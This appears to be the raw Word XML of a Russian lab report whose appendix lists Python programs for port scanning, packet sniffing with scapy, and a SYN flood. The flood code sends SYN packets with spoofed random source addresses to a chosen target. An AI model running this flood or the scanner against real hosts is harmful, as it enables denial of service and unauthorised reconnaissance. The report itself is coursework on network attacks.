      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6291F4" w14:textId="3E8D52E4" w:rsidR="004B4A36" w:rsidRPr="00146D6E" w:rsidRDefault="00146D6E" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="aa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ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00146D6E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB1C60D" wp14:editId="1507B6AB">
            <wp:extent cx="3705742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6863048" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00596A88" w:rsidRDefault="004B4A36" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="aa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w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис 3. Результат работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F710B2" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRDefault="00085EF1" w:rsidP="00085EF1">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45487500" w14:textId="77777777"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07BD500E" w14:textId="77777777"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04B4CE67" w14:textId="77777777" w:rsidR="00A02908" w:rsidRPr="00042193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14:paraId="275F0A6E" w14:textId="77777777" w:rsidR="000627BA" w:rsidRDefault="000627BA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:sectPr w:rsidR="000627BA" w:rsidSect="00C66F52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9" w:name="_uyw0m9k4f85u" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="041FDC9B" w14:textId="77777777" w:rsidR="00C66F52" w:rsidRDefault="00130B02" w:rsidP="00130B02">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6111"/>
        </w:tabs>
        <w:spacing w:after="360" w:line="363" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc63541364"/>
      <w:bookmarkStart w:id="11" w:name="_Toc65156183"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение. Текст программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="555ED417" w14:textId="77777777" w:rsidR="00130B02" w:rsidRPr="00596A88" w:rsidRDefault="004B50C9" w:rsidP="00130B02">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Passive</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88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scan</w:t>
      </w:r>
      <w:r w:rsidR="00130B02" w:rsidRPr="00596A88">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB4F85" w14:textId="77777777" w:rsidR="00130B02" w:rsidRPr="00130B02" w:rsidRDefault="00130B02" w:rsidP="00130B02">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1126810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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FB51E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import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A440AC0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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D5333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5A4D9149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is_finish = [False]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB7B7A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554CEEFB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0378F02C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def thread_scanner(ip_t: str, port_s: int, port_e: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A28B6B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for port in range(port_s, port_e):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB73FE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sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DB53D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if not sock.connect_ex((ip_t, port)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E9018" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRPr="00596A88" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28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    print</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">('Открытый порт  :', </w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633AC5A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596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC945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3D92D7AB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if is_finish[0]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456898B5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    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B72C92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0635CE8F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5941FE8B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def thread_exit():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEF5FC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while not is_finish[0]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF9612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data = input()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECFBFD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if data == 'exit':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C15BD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        is_finish[0] = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282AE507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10A1109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0E05480C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>if __name__ == '__main__':                         # example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA99EC4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ip_target = input('\nIP цели        : ')       # localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353CBE10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port_start = int(input('Стартовый порт : '))   # 130 | 440</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76544533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port_end = int(input('Конечный порт  : '))     # 140 | 450</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFAA1E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1A5E0CA7" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRPr="00596A88" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28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print</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('\</w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск пошёл...\</w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для остановки введите `</w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>`')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25182EA6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596A88">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_scan = threading.Thread(target=thread_scanner, args=(ip_target, port_start, port_end + 1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC250D3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t_exit = threading.Thread(target=thread_exit, daemon=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3832C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13EC04A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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A5F91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51B117AA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t_scan.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5B45F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t_exit.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34454B4C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t_scan.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61667195" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRPr="004B50C9" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32204C34" w14:textId="77777777" w:rsidR="00130B02" w:rsidRPr="00596A88" w:rsidRDefault="004B50C9" w:rsidP="004B50C9">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B50C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print('\nВремя работы   :', str(time.time() - start_time)[:-13], 'секунд\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C183006" w14:textId="77777777" w:rsidR="00130B02" w:rsidRPr="00596A88" w:rsidRDefault="00130B02" w:rsidP="00130B02">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F71471" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRPr="00596A88" w:rsidRDefault="00085EF1" w:rsidP="00130B02">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD83115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13DFBA0A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08F0C915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185EEDFE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0CDCE811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11BF8FE6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7D00151C" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRPr="00596A88" w:rsidRDefault="004B50C9" w:rsidP="00130B02">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0736D9F9" w14:textId="77777777" w:rsidR="00085EF1" w:rsidRPr="00596A88" w:rsidRDefault="00085EF1" w:rsidP="00130B02">
      <w:pPr>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E54D03D" w14:textId="77777777" w:rsidR="000627BA" w:rsidRPr="00095B94" w:rsidRDefault="004B4A36" w:rsidP="00130B02">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sniffing</w:t>
      </w:r>
      <w:r w:rsidR="00130B02" w:rsidRPr="00130B02">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C5A97F" w14:textId="77777777" w:rsidR="000627BA" w:rsidRPr="00095B94" w:rsidRDefault="000627BA" w:rsidP="000627BA">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:ind w:left="1186"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18045836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>from scapy.all import sniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8D8D2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>from scapy.layers.inet import IP, TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362DBE3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429A6703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86EA5DF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>def print_summary(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE364E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if IP in pkt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5FD17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    ip_src, ip_dst = pkt[IP].src, pkt[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B4262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460E7A26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if TCP in pkt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470E7C3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    tcp_sport, tcp_dport = pkt[TCP].sport, pkt[TCP].dport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A77E327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14523BAB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    print('От', str(ip_src), ':', str(tcp_sport))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7C333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    print('К ', str(ip_dst), ':', str(tcp_dport), '\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57983838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05B19B22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09991237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>if __name__ == '__main__':             # example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C778F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ip_target = input('\nIP цели : ')  # '' | start sniffing with {IP}, and then start flooding this {IP}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06638FE8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4945A6C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sniff_filter = 'ip' if ip_target == ' ' else 'ip and host ' + ip_target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DC258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9F56D08" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRP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print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17649530" w14:textId="77777777" w:rsidR="00C66F52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  <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    sniff(filter=sniff_filter, prn=print_summary, store=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC1EA5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3F04901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242D7385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7EB58C14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15CBE882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4AA385D6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7E524EEF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6AB321E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60AE7626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1FF77410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732C3EA2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036BCF3B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59F9C002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5D47E1B2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29AA42C1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03CFBED5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53D8A740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9953318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2BD5E853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483E925E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2381EE4D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4A9FC4C2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6E4C1693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780AE5E8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5522F3AF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8EB6AE6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3A70C9BB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13F7CC0D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  <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245BBC48" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRDefault="004B4A36" w:rsidP="004B4A3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6E52DA6A" w14:textId="77777777" w:rsidR="000E3023" w:rsidRDefault="000E3023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7B92008D" w14:textId="77777777" w:rsidR="000E3023" w:rsidRPr="00095B94" w:rsidRDefault="004B4A36" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="466"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SYN Flooding</w:t>
      </w:r>
      <w:r w:rsidR="000E3023" w:rsidRPr="00130B02">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000E3023" w:rsidRPr="00596A88">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C1EBB" w14:textId="77777777" w:rsidR="000E3023" w:rsidRPr="00095B94" w:rsidRDefault="000E3023" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:ind w:left="1186"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A3A900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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F974043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from random import randint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48892D52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from scapy.layers.inet import IP, TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C7A9B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7B1861A6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7167193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def get_random_IP():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3FFD6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return ".".join(map(str, (randint(0, 255) for _ in range(4))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E9DDFF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26F6373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4EB1CA18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def get_random_int():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A2E322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return randint(1000, 9000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F05A6F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33CA07F3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689FD4E2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def syn_flood(ip_dst, dport, amnt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6D99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packet_deserved = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC72B03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print("\nНачало отправки...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C9D6C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18423F9B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for packet in range(0, amnt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EDB93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s_port, s_eq, w_indow = get_random_int(), get_random_int(), get_random_int()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A6E12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30AD6FF2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IP_Packet = IP()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AC74BA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IP_Packet.src, IP_Packet.dst = get_random_IP(), ip_dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06C6EE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2E0A7D9E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TCP_Packet = TCP()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381D21D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TCP_Packet.sport, TCP_Packet.dport = s_port, dport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066699D3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TCP_Packet.flags = "S"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2927EDB9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TCP_Packet.seq, TCP_Packet.window = s_eq, w_indow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7A347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1A9FC92A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send(IP_Packet / TCP_Packet, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF51929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    packet_deserved += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD32FFC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0FE49437" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00C279AB" w:rsidRDefault="004B4A36" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:firstLine="593"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print</w:t>
      </w:r>
      <w:r w:rsidRPr="00C279AB">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('\</w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00C279AB">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Всего пакетов отправлено', </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00C279AB">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00C279AB">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16C843" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00C279AB" w:rsidRDefault="004B4A36" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:firstLine="593"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380D9AB7" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00C279AB" w:rsidRDefault="004B4A36" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:firstLine="593"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF5394A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>if __name__ == '__main__':                            # example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A3D1C7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ip_target = input('\nIP цели         : ')         # start sniffing with {IP}, and then start flooding this {IP}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B3AFE9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port_target = int(input('Порт цели       : '))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497057B5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packet_amount = int(input('Кол-во пакетов  : '))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1A154" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="004B4A36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6BF706E7" w14:textId="77777777" w:rsidR="000E3023" w:rsidRDefault="004B4A36" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:firstLine="593"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4A36">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    syn_flood(ip_target, port_target, packet_amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED0C1A0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29A1251E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2619AB78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41D3DD94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77E85F70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28A24260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73D92BEC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6D76EEC6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06B30D75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1E17E7CB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1624299F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045D6832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0E72F8D2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6BC03BAC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48BE15D8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3F58C9B9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4C3F9845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3EC175A5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1ECB07F8" w14:textId="77777777" w:rsidR="00ED3846" w:rsidRDefault="00ED3846" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:firstLine="593"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFD8471" w14:textId="77777777" w:rsidR="000E3023" w:rsidRPr="00596A88" w:rsidRDefault="000E3023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sectPr w:rsidR="000E3023" w:rsidRPr="00596A88" w:rsidSect="00C66F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1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6F05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5D4D71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A7A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13D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7E2E356"/>
    <w:lvl w:ilvl="0" w:tplc="1E44892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4B0006"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11E01020"/>
    <w:lvl w:ilvl="0" w:tplc="C98C9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FE559B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7986933E"/>
    <w:lvl w:ilvl="0" w:tplc="A6C0C1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5A1601"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="935A6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25DC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2500C3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94B562E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B650D396"/>
    <w:lvl w:ilvl="0" w:tplc="A6C0C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 w15:restartNumberingAfterBreak="0">
